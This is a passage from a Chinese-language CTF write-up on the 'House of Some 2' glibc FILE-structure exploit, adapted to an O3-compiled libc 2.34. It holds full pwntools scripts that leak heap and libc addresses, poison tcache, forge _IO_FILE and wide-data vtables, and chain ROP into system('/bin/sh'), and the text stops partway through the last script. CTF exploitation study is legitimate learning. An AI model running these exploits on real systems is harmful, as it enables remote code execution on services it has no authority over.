这样rdx就会被一个libc的地址覆盖,在后面执行_IO_default_xsputnread的时候就会出问题

看了下偏移,题目用的libc估计是O2优化,反正偏移跟我自己编的O2是一样的

就不能用House of Some 2去打了

下面就以我自己O3编译的libc为例子,看看要怎么打(上面给文件了,反正我也拿不到别的libc了)

PS:Ofast编译报错,懒得折腾了,逃

O3libc中并没有这一句汇编,所以IO_validate_vtable并不会影响rdx

但是在_IO_SYSREAD之后,执行到_IO_new_file_underflow大概的

1
2
3
4
5
6
7
8
9
10
11
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);

这个地方,有一句这样的汇编

也就是会把_offset的值拿给rdx

虽然这跟纯血的House of Some 2不太一样,但起码rdx是可控的

PS:如果只关注纯血版本的后面就可以不用看了,不一样的

知道这些不同后就可以来看看payload要怎么写了

首先算一下内存布局,上面的rdx设置的是rop的长度加上&st到返回地址的偏移,调了一下,_IO_file_underflow_maybe_mmap的返回地址在&st0xb8之后

参考 @CSOME 的做法,我可以把&st复制到_IO_2_1_stdout_上方,这样我就可以在修改栈的时候把_IO_2_1_stdout_也一起改了,也就是下面接的是_IO_2_1_stdout_,其中_IO_2_1_stdout_的大小是0xe0,即struct _IO_FILE_plus结构的大小

接着还需要伪造_IO_2_1_stdout_.file._wide_data,即struct _IO_wide_data结构,大小是0xe8,我也直接抄的,写在_IO_2_1_stdout_后面

PS:其实_wide_data主要能写最后的_wide_vtable就好了,可以省一点位置,但这里反正read大小不限,能抄就直接抄了

也就是我想要的内存分布大概是

1
2
3
4
5
- count        : copyed from &st
- (count-0xb8) : retn
0x00 : _IO_2_1_stdout_
+ 0xe0 : fake _IO_wide_data structure
+ 0x1c8 : end

然后看_IO_default_xsputn,在函数的最后需要绕过干扰

1
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)

根据之前分析,需要

1
count = _IO_write_end - _IO_write_ptr = rdx

再看在_IO_default_xsputn里面我想要执行的是

1
mempcpy(_IO_write_ptr, &st, _IO_write_end - _IO_write_ptr)

这里需要复制rdx个字节到&_IO_2_1_stdout_ - rdx上,所以即

1
2
3
4
_offset       = rdx
_IO_write_ptr = &_IO_2_1_stdout_ - rdx
_IO_write_end = _IO_write_ptr + rdx
= &_IO_2_1_stdout_

接着看_wide_data,这里直接把其中的_wide_vtable设置成libc_IO_wfile_jumps_maybe_mmap就好,其他的好像都无所谓

最后剩下的和入口的payload差不多

需要注意的是,我要read的地址是retn的位置,即_IO_file_underflow_maybe_mmap函数返回地址的位置,也即&_IO_2_1_stdout_ - rdx + 0xb8read大小是0x1c8 - (rdx - 0xb8)就好,即

1
2
3
_IO_buf_base = &_IO_2_1_stdout_ - rdx + 0xb8
_IO_buf_end = _IO_buf_base + 0x1c8 - (rdx - 0xb8)
= &_IO_2_1_stdout_ + 0x1c8

参考的payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
offset_retn = 0xb8  # retn of _IO_file_underflow_maybe_mmap
rop = [... ...]
rdx = offset_retn + len(rop) * 8
payload2 = flat({
0x08: libc_stdout, # _IO_read_ptr > readable address,
# or corrupu in fileops:537,
# return *(unsigned char *) fp->_IO_read_ptr;
0x28: libc_stdout - rdx, # _IO_write_ptr > memcpy dest
0x30: libc_stdout, # _IO_write_end > memcpy n = rdx
0x38: libc_stdout - rdx + offset_retn, # _IO_buf_base > read buf
0x40: libc_stdout + 0x1c8, # _IO_buf_end > memcpy n and read nbytes,
# size of stack + stdout(_IO_FILE_plus + _IO_wide_data)
0x70: 0, # _fileno > read fd, stdin
0x90: rdx, # _offset > rdx for O3
0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
0xc0: 0, # _mode < 0
0xd8: libc_IO_default_xsputn - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
0xe0: {
0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
}
}, filler=b"\x00")

Part.3 第二次循环·

控制第一次循环的payload在第一次循环最后的的read中输入,这里是为了执行_IO_default_xsgetn

注意在payload输入完后,执行_IO_default_xsgetn就会把东西复制会栈上,所以写payload的时候要顺便把rop写上

回顾一下我叠好的内存分布

1
2
3
4
5
- rdx        : copyed from &st
- (rdx-0xb8) : retn <= payload start
0x00 : _IO_2_1_stdout_
+ 0xe0 : fake _IO_wide_data structure
+ 0x1c8 : end

payload写的位置是从retn开始,即payload的前(rdx-0xb8)个字节是我的rop

后面就跟Part.2的差不多,只是里面做的是

1
mempcpy(&st, _IO_read_ptr, _IO_read_end - _IO_read_ptr)

还有需要绕过的是

1
count = _IO_read_end - _IO_read_ptr = rdx

所以需要设置的是

1
2
3
4
_offset      = rdx
_IO_read_ptr = &_IO_2_1_stdout_ - rdx
_IO_read_end = _IO_read_ptr + rdx
= &_IO_2_1_stdout_

另外因为后面的_IO_SYSREAD是进不去的,所以_IO_buf_base_IO_buf_end也不需要了

参考的payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
payload3 = flat({
0x00: rop, # retn
rdx - offset_retn: {
0x08: libc_stdout - rdx, # _IO_read_ptr > memcpy src
0x10: libc_stdout, # _IO_read_end > memcpy n = rdx
0x90: rdx, # _offset > rdx for O3
0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
0xc0: 0, # _mode < 0
0xd8: libc_IO_default_xsgetn - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
0xe0: {
0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
}
}
}, filler=b"\x00")

Part.4 rop·

最后的rop就是常规操作了

理论上我的rop是简单的

1
2
3
pop rdi
pointer to '/bin/sh\x00'
libc_system

但我这样叠的话到do_system那里会有一个报错

大概意思xmmword指令需要参数的地址是16字节对齐(即word),而因为这时候的栈被我改过,所以这里栈上的地址就没有对齐

解决方法是,在rop前面加一句ret,往xmmword指令的地址加个8就好了

即最后的rop

1
2
3
4
5
0x00: ret
0x08: pop rdi
0x10: pointer to 0x20
0x18: libc_system
0x20: '/bin/sh\x00'

参考Exp·

打O3·

按上面流程的话,exp是:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
from pwn import *
from time import sleep
context.log_level = 'debug'
context.arch = 'amd64' # for flat
context.terminal = ['wt.exe', 'bash', '-c']
T = 0.1

LOCAL = True
AUTOGDB = True
DEBUG = True
if LOCAL:
env = {'LD_LIBRARY_PATH': '.'}
r = process('./pwn', env=env)
if AUTOGDB:
gid, g = gdb.attach(r, api=True, gdbscript='')
sleep(1)
AUTOGDB and g.execute('dir ./src') and sleep(T)
AUTOGDB and g.execute('c') and sleep(T)
else:
gdb.attach(r, gdbscript='dir ./src')
input('Waiting GDB...')
else:
AUTOGDB = False
r = remote('node4.anna.nssctf.cn', 28144)

def add():
r.sendlineafter(b'Choice: ', b'1')
sleep(T)

def delete(idx):
r.sendlineafter(b'Choice: ', b'2')
r.sendlineafter(b'Idx: ', str(idx).encode())
sleep(T)

def show(idx):
r.sendlineafter(b'Choice: ', b'3')
r.sendlineafter(b'Idx: \n', str(idx).encode())
return r.recvuntil(b'\nDone', drop=True)

def edit(idx, content):
r.sendlineafter(b'Choice: ', b'4')
r.sendlineafter(b'Idx: ', str(idx).encode())
#r.sendlineafter(b'Size: ', str(size).encode())
r.sendlineafter(b'Size: ', str(len(content)).encode())
r.sendafter(b'Content: ', content)
sleep(T)

AUTOGDB and g.execute('p "leak heap_base"') and sleep(T)
add() # 0
delete(0)
#AUTOGDB and g.execute('b malloc.c:3068') and sleep(T)
heap_base = u64(show(0).ljust(8, b'\x00')) << 12
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
print(f'{hex(heap_base) = }')

def PROTECT_PTR(ptr):
return (heap_base >> 12) ^ ptr

edit(0, '0' * 8)
tcache_key = show(0)[8:]
print(f'{tcache_key.hex() = }')


AUTOGDB and g.execute('p "leak libc_base"') and sleep(T)
for _ in range(8):
add() # 1 - 8
add() # 9, split top_chunk

for i in range(1, 7+1):
delete(i)
delete(8)
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
if DEBUG:
libc_base = u64(show(8).ljust(8, b'\x00')) - 0x21bcc0 # debug
libc = ELF('libc-2.34-debug-O3.so')
else:
libc_base = u64(show(8).ljust(8, b'\x00')) - 0x1f2cc0
libc = ELF('libc.so')
print(f'{hex(libc_base) = }')
libc.address = libc_base


AUTOGDB and g.execute('p "house of some 2"') and sleep(T)
libc_stdout = libc.symbols['_IO_2_1_stdout_']

AUTOGDB and g.execute('p _IO_2_1_stderr_') and sleep(T)
'''
file = {
... ...
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7f27c2b82600 <__GI__IO_file_jumps> <= +0xd8
}
'''
AUTOGDB and g.execute('hexdump &_IO_2_1_stderr_ 0x100') and sleep(T)
'''
+00c0 0x7f853d9dc740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │........│........│ <= stderr.file._unused
+00d0 0x7f853d9dc750 00 00 00 00 00 00 00 00 00 86 9d 3d 85 7f 00 00 │........│...=....│ <= stderr.vtable
+00e0 0x7f853d9dc760 87 28 ad fb 00 00 00 00 e3 c7 9d 3d 85 7f 00 00 │.(......│...=....│ <= stdout
+00f0 0x7f853d9dc770 e3 c7 9d 3d 85 7f 00 00 e3 c7 9d 3d 85 7f 00 00 │...=....│...=....│
'''

assert (libc_stdout - 0x10) & 0b1111 == 0
edit(7, p64(PROTECT_PTR(libc_stdout - 0x10))) # e->key > stderr.vtable (or - 0x20 to _unused?)
AUTOGDB and g.execute('bins') and sleep(T)

add() # 10
add() # 11
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('p &_IO_2_1_stdout_') and sleep(T)

'''
_IO_file_xsputn > _IO_wfile_underflow_maybe_mmap
_IO_file_stat > _IO_new_file_write
'''
libc_IO_wfile_jumps_maybe_mmap = libc.symbols['_IO_wfile_jumps_maybe_mmap']

# copyed from @csome
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload1 = flat({
0x00: 0x8000, # _IO_USER_LOCK > disable lock
0x38: libc_stdout, # _IO_buf_base > read buf
0x40: libc_stdout + 0x1c8, # _IO_buf_end > read nbytes 0x1c8,
# size of _IO_FILE_plus + _IO_wide_data
0x70: 0, # _fileno > read fd, stdin
0xa0: libc_stdout + 0x100, # _wide_data > writable address,
# or corrupt in fileops.c:717,
# decide_maybe_mmap: fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
0xc0: 0, # _mode < 0
0xd8: libc_IO_wfile_jumps_maybe_mmap - 0x18, # vtable
}, filler=b"\x00")
payload1 = flat([0, 0], filler=b"\x00") + payload1 # stderr._unused2 and stderr.vtable

#AUTOGDB and g.execute('b fileops.c:717') and sleep(T)
#AUTOGDB and g.execute('b fileops.c:668') and sleep(T)
edit(11, payload1)
AUTOGDB and g.execute('p _IO_2_1_stdout_') and sleep(T)


libc_IO_str_jumps = libc.symbols['_IO_str_jumps']
libc_IO_default_xsputn = libc_IO_str_jumps + 0x38
libc_IO_default_xsgetn = libc_IO_str_jumps + 0x40

O = 3
if O == 3:
libc_pop_rdi = libc_base + 0x2dc12
libc_ret = libc_base + 0x2c718
libc_system = libc.symbols['system']

offset_retn = 0xb8 # retn of _IO_file_underflow_maybe_mmap
rop = [
libc_ret, # align to 16 bytes in do_system+338
libc_pop_rdi, libc_stdout - 0x1c8 + offset_retn + 0x8 * 4,
libc_system,
u64(b'/bin/sh\x00')
]
# 0x1c8 > _IO_FILE_plus + _IO_wide_data
#rdx = offset_retn + 0x1c8 # real House of Some 2
rdx = offset_retn + len(rop) * 8

# mempcpy(stdio->_IO_write_ptr, &st, stdout->_IO_buf_end - stdout->_IO_buf_base)
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload2 = flat({
0x08: libc_stdout, # _IO_read_ptr > readable address,
# or corrupu in fileops:537,
# return *(unsigned char *) fp->_IO_read_ptr;
0x28: libc_stdout - rdx, # _IO_write_ptr > memcpy dest
0x30: libc_stdout, # _IO_write_end > memcpy n = rdx
0x38: libc_stdout - rdx + offset_retn, # _IO_buf_base > read buf
0x40: libc_stdout + 0x1c8, # _IO_buf_end > memcpy n and read nbytes,
# size of stack + stdout(_IO_FILE_plus + _IO_wide_data)
0x70: 0, # _fileno > read fd, stdin
0x90: rdx, # _offset > rdx for O3
0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
0xc0: 0, # _mode < 0
0xd8: libc_IO_default_xsputn - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
0xe0: {
0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
}
}, filler=b"\x00")
#AUTOGDB and g.execute('b fileops.c:668') and sleep(T)
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x95a04)}') and sleep(T) # memcpy in xsputn
r.send(payload2)

# mempcpy(&st, stdio->_IO_read_ptr, stdout->_IO_buf_end - stdout->_IO_buf_base)
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload3 = flat({
#0x00: 0xdeadbeaf, # retn
0x00: rop, # retn
rdx - offset_retn: {
0x08: libc_stdout - rdx, # _IO_read_ptr > memcpy src
0x10: libc_stdout, # _IO_read_end > memcpy n = rdx
0x90: rdx, # _offset > rdx for O3
0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
0xc0: 0, # _mode < 0
0xd8: libc_IO_default_xsgetn - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
0xe0: {
0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
}
}
}, filler=b"\x00")
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x95c79)}') and sleep(T) # memcpy in xsgetn
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x936a5)}') and sleep(T) # ret
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x59192)}') and sleep(T) # system
r.send(payload3)

r.interactive()
r.close()

没有canary·

根据编译情况,libc中的函数调用可能会没有canary

如果没有canary的话,就可以让第一次循环的_IO_SYSSTAT指向_IO_file_read,直接做栈溢出

调用栈为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// entrance
_IO_puts (const char *str)
>_IO_wfile_underflow_maybe_mmap (stdout) // loop
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
======> read(0, &_IO_2_1_stdout_, n0) // modify _wide_vtable
==> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
// first loop
====> _IO_file_underflow_maybe_mmap (stdout)
======> decide_maybe_mmap (stdout)
========> _IO_file_read (stdout, &st, rdx)
==========> read(0, &st, rdx) // read rop to &st
========> // revert vtable and _wide_vtable
======> _IO_file_underflow (stdout) // _IO_UNDERFLOW
========> // set n=0 in read and pass
====> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
====> // return to rop
==> rop

参考exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
from pwn import *
from time import sleep
context.log_level = 'debug'
context.arch = 'amd64' # for flat
context.terminal = ['wt.exe', 'bash', '-c']
T = 0.1

LOCAL = True
AUTOGDB = True
DEBUG = True
if LOCAL:
env = {'LD_LIBRARY_PATH': '.'}
r = process('./pwn', env=env)
if AUTOGDB:
gid, g = gdb.attach(r, api=True, gdbscript='')
sleep(1)
AUTOGDB and g.execute('dir ./src') and sleep(T)
AUTOGDB and g.execute('c') and sleep(T)
else:
gdb.attach(r, gdbscript='dir ./src')
input('Waiting GDB...')
else:
AUTOGDB = False
r = remote('node4.anna.nssctf.cn', 28144)

def add():
r.sendlineafter(b'Choice: ', b'1')
sleep(T)

def delete(idx):
r.sendlineafter(b'Choice: ', b'2')
r.sendlineafter(b'Idx: ', str(idx).encode())
sleep(T)

def show(idx):
r.sendlineafter(b'Choice: ', b'3')
r.sendlineafter(b'Idx: \n', str(idx).encode())
return r.recvuntil(b'\nDone', drop=True)

def edit(idx, content):
r.sendlineafter(b'Choice: ', b'4')
r.sendlineafter(b'Idx: ', str(idx).encode())
#r.sendlineafter(b'Size: ', str(size).encode())
r.sendlineafter(b'Size: ', str(len(content)).encode())
r.sendafter(b'Content: ', content)
sleep(T)

AUTOGDB and g.execute('p "leak heap_base"') and sleep(T)
add() # 0
delete(0)
#AUTOGDB and g.execute('b malloc.c:3068') and sleep(T)
heap_base = u64(show(0).ljust(8, b'\x00')) << 12
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
print(f'{hex(heap_base) = }')

def PROTECT_PTR(ptr):
return (heap_base >> 12) ^ ptr

edit(0, '0' * 8)
tcache_key = show(0)[8:]
print(f'{tcache_key.hex() = }')


AUTOGDB and g.execute('p "leak libc_base"') and sleep(T)
for _ in range(8):
add() # 1 - 8
add() # 9, split top_chunk

for i in range(1, 7+1):
delete(i)
delete(8)
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
if DEBUG:
libc_base = u64(show(8).ljust(8, b'\x00')) - 0x21bcc0 # debug
libc = ELF('libc-2.34-debug-O3.so')
else:
libc_base = u64(show(8).ljust(8, b'\x00')) - 0x1f2cc0
libc = ELF('libc.so')
print(f'{hex(libc_base) = }')
libc.address = libc_base


AUTOGDB and g.execute('p "house of some 2"') and sleep(T)
libc_stdout = libc.symbols['_IO_2_1_stdout_']

AUTOGDB and g.execute('p _IO_2_1_stderr_') and sleep(T)
'''
file = {
... ...
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7f27c2b82600 <__GI__IO_file_jumps> <= +0xd8
}
'''
AUTOGDB and g.execute('hexdump &_IO_2_1_stderr_ 0x100') and sleep(T)
'''
+00c0 0x7f853d9dc740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │........│........│ <= stderr.file._unused
+00d0 0x7f853d9dc750 00 00 00 00 00 00 00 00 00 86 9d 3d 85 7f 00 00 │........│...=....│ <= stderr.vtable
+00e0 0x7f853d9dc760 87 28 ad fb 00 00 00 00 e3 c7 9d 3d 85 7f 00 00 │.(......│...=....│ <= stdout
+00f0 0x7f853d9dc770 e3 c7 9d 3d 85 7f 00 00 e3 c7 9d 3d 85 7f 00 00 │...=....│...=....│
'''

assert (libc_stdout - 0x10) & 0b1111 == 0
edit(7, p64(PROTECT_PTR(libc_stdout - 0x10))) # e->key > stderr.vtable (or - 0x20 to _unused?)
AUTOGDB and g.execute('bins') and sleep(T)

add() # 10
add() # 11
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('p &_IO_2_1_stdout_') and sleep(T)

'''
_IO_file_xsputn > _IO_wfile_underflow_maybe_mmap
_IO_file_stat > _IO_new_file_write
'''
libc_IO_wfile_jumps_maybe_mmap = libc.symbols['_IO_wfile_jumps_maybe_mmap']

# copyed from @csome
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload1 = flat({
0x00: 0x8000, # _IO_USER_LOCK > disable lock
0x38: libc_stdout, # _IO_buf_base > read buf
0x40: libc_stdout + 0x1c8, # _IO_buf_end > read nbytes 0x1c8,
# size of _IO_FILE_plus + _IO_wide_data
0x70: 0, # _fileno > read fd, stdin
0xa0: libc_stdout + 0x100, # _wide_data > writable address,
# or corrupt in fileops.c:717,
# decide_maybe_mmap: fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
0xc0: 0, # _mode < 0
0xd8: libc_IO_wfile_jumps_maybe_mmap - 0x18, # vtable
}, filler=b"\x00")
payload1 = flat([0, 0], filler=b"\x00") + payload1 # stderr._unused2 and stderr.vtable

#AUTOGDB and g.execute('b fileops.c:668') and sleep(T)
edit(11, payload1)
AUTOGDB and g.execute('p _IO_2_1_stdout_') and sleep(T)


libc_IO_file_jumps = libc.symbols['_IO_file_jumps']
libc_IO_file_read = libc_IO_file_jumps + 0x70

O = 3
if O == 3:
libc_pop_rdi = libc_base + 0x2dc12
libc_ret = libc_base + 0x2c718
libc_system = libc.symbols['system']
libc_sh = next(libc.search('/bin/sh'))

offset_retn = 0xb8 # retn from _IO_file_underflow_maybe_mmap to _IO_wfile_underflow_maybe_mmap
rop = [
libc_ret, # align to 16 bytes in do_system+338
libc_pop_rdi, libc_sh,
libc_system,
]
rop = flat([0] * (offset_retn // 8) + rop, filler=b"\x00")
rdx = len(rop)

# read(stdout->_fileno, &st, rdx)
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload2 = flat({
0x08: libc_stdout, # _IO_read_ptr > readable address,
# or corrupu in fileops:537,
# return *(unsigned char *) fp->_IO_read_ptr;
0x38: libc_stdout,
0x40: libc_stdout, # _IO_buf_end > read n = 0,
0x70: 0, # _fileno > read fd, stdin
0x90: rdx, # _offset > rdx for O3
0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
0xc0: 0, # _mode < 0
0xd8: libc_IO_file_read - 0x90, # vtable, 0x90 > offset of __stat in _IO_jump_t
0xe0: {
0xe0: libc_IO_wfile_jumps_maybe_mmap # _wide_data->_wide_vtable
}
}, filler=b"\x00")
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x93631)}') and sleep(T) # read
r.send(payload2)

AUTOGDB and g.execute(f'b *{hex(libc_base + 0x936a5)}') and sleep(T) # ret
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x59192)}') and sleep(T) # system
r.send(rop)

r.interactive()
r.close()

没有_wide_vtable的validate检查·

在目前最新版本的libc-2.41中其实都还没有_wide_vtable的检查,所以其实现在都还能用

如果没有_wide_vtable的检查的话,就可以直接把_wide_vtable指向我伪造的struct _IO_jump_t结构体,然后让_IO_WUNDERFLOW指向one_gadget或者system

这里我用的是调system的方法,叠的是

1
2
3
- 0x08       : system addr
0x00 : stdout (_flag = '/bin/sh\x00')
+ 0xe0 + 0xe0: stdout - 0x8 (_wide_vtable)

one_gadget的话把system改成one_gadget地址就好了

PS:本来我是想在入口就叠好这个的,但是执行到_IO_puts_IO_acquire_lock (stdout)时,如果_flag不设置_IO_USER_LOCK的话就会卡住,所以就没办法了,如果调one_gadget的话可能可以

参考exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
from pwn import *
from time import sleep
context.log_level = 'debug'
context.arch = 'amd64' # for flat
context.terminal = ['wt.exe', 'bash', '-c']
T = 0.1

LOCAL = True
AUTOGDB = True
DEBUG = True
if LOCAL:
env = {'LD_LIBRARY_PATH': '.'}
r = process('./pwn', env=env)
if AUTOGDB:
gid, g = gdb.attach(r, api=True, gdbscript='')
sleep(1)
AUTOGDB and g.execute('dir ./src') and sleep(T)
AUTOGDB and g.execute('c') and sleep(T)
else:
gdb.attach(r, gdbscript='dir ./src')
input('Waiting GDB...')
else:
AUTOGDB = False
r = remote('node4.anna.nssctf.cn', 28144)

def add():
r.sendlineafter(b'Choice: ', b'1')
sleep(T)

def delete(idx):
r.sendlineafter(b'Choice: ', b'2')
r.sendlineafter(b'Idx: ', str(idx).encode())
sleep(T)

def show(idx):
r.sendlineafter(b'Choice: ', b'3')
r.sendlineafter(b'Idx: \n', str(idx).encode())
return r.recvuntil(b'\nDone', drop=True)

def edit(idx, content):
r.sendlineafter(b'Choice: ', b'4')
r.sendlineafter(b'Idx: ', str(idx).encode())
#r.sendlineafter(b'Size: ', str(size).encode())
r.sendlineafter(b'Size: ', str(len(content)).encode())
r.sendafter(b'Content: ', content)
sleep(T)

AUTOGDB and g.execute('p "leak heap_base"') and sleep(T)
add() # 0
delete(0)
#AUTOGDB and g.execute('b malloc.c:3068') and sleep(T)
heap_base = u64(show(0).ljust(8, b'\x00')) << 12
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
print(f'{hex(heap_base) = }')

def PROTECT_PTR(ptr):
return (heap_base >> 12) ^ ptr

edit(0, '0' * 8)
tcache_key = show(0)[8:]
print(f'{tcache_key.hex() = }')


AUTOGDB and g.execute('p "leak libc_base"') and sleep(T)
for _ in range(8):
add() # 1 - 8
add() # 9, split top_chunk

for i in range(1, 7+1):
delete(i)
delete(8)
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('bins') and sleep(T)
if DEBUG:
libc_base = u64(show(8).ljust(8, b'\x00')) - 0x21bcc0 # debug
libc = ELF('libc-2.34-debug-O3.so')
else:
libc_base = u64(show(8).ljust(8, b'\x00')) - 0x1f2cc0
libc = ELF('libc.so')
print(f'{hex(libc_base) = }')
libc.address = libc_base


AUTOGDB and g.execute('p "house of some 2"') and sleep(T)
libc_stdout = libc.symbols['_IO_2_1_stdout_']

AUTOGDB and g.execute('p _IO_2_1_stderr_') and sleep(T)
'''
file = {
... ...
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7f27c2b82600 <__GI__IO_file_jumps> <= +0xd8
}
'''
AUTOGDB and g.execute('hexdump &_IO_2_1_stderr_ 0x100') and sleep(T)
'''
+00c0 0x7f853d9dc740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │........│........│ <= stderr.file._unused
+00d0 0x7f853d9dc750 00 00 00 00 00 00 00 00 00 86 9d 3d 85 7f 00 00 │........│...=....│ <= stderr.vtable
+00e0 0x7f853d9dc760 87 28 ad fb 00 00 00 00 e3 c7 9d 3d 85 7f 00 00 │.(......│...=....│ <= stdout
+00f0 0x7f853d9dc770 e3 c7 9d 3d 85 7f 00 00 e3 c7 9d 3d 85 7f 00 00 │...=....│...=....│
'''

assert (libc_stdout - 0x10) & 0b1111 == 0
edit(7, p64(PROTECT_PTR(libc_stdout - 0x10))) # e->key > stderr.vtable (or - 0x20 to _unused?)
AUTOGDB and g.execute('bins') and sleep(T)

add() # 10
add() # 11
AUTOGDB and g.execute('x/20gx $rebase(0x4060)') and sleep(T)
AUTOGDB and g.execute('p &_IO_2_1_stdout_') and sleep(T)

'''
_IO_file_xsputn > _IO_wfile_underflow_maybe_mmap
_IO_file_stat > _IO_new_file_write
'''
libc_IO_wfile_jumps_maybe_mmap = libc.symbols['_IO_wfile_jumps_maybe_mmap']
libc_system = libc.symbols['system']

# copyed from @csome
# read(stdout->_fileno, stdout->_IO_buf_base, stdout->_IO_buf_end - stdout->_IO_buf_base)
payload1 = flat({
0x00: 0x8000, # _IO_USER_LOCK > disable lock
0x38: libc_stdout, # _IO_buf_base > read buf
0x40: libc_stdout + 0x1c8, # _IO_buf_end > read nbytes 0x1c8,
# size of _IO_FILE_plus + _IO_wide_data
0x70: 0, # _fileno > read fd, stdin
0xa0: libc_stdout + 0x100, # _wide_data > writable address,
# or corrupt in fileops.c:717,
# decide_maybe_mmap: fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
0xc0: 0, # _mode < 0
0xd8: libc_IO_wfile_jumps_maybe_mmap - 0x18, # vtable
}, filler=b"\x00")
payload1 = flat([0, libc_system], filler=b"\x00") + payload1 # stderr._unused2 and stderr.vtable

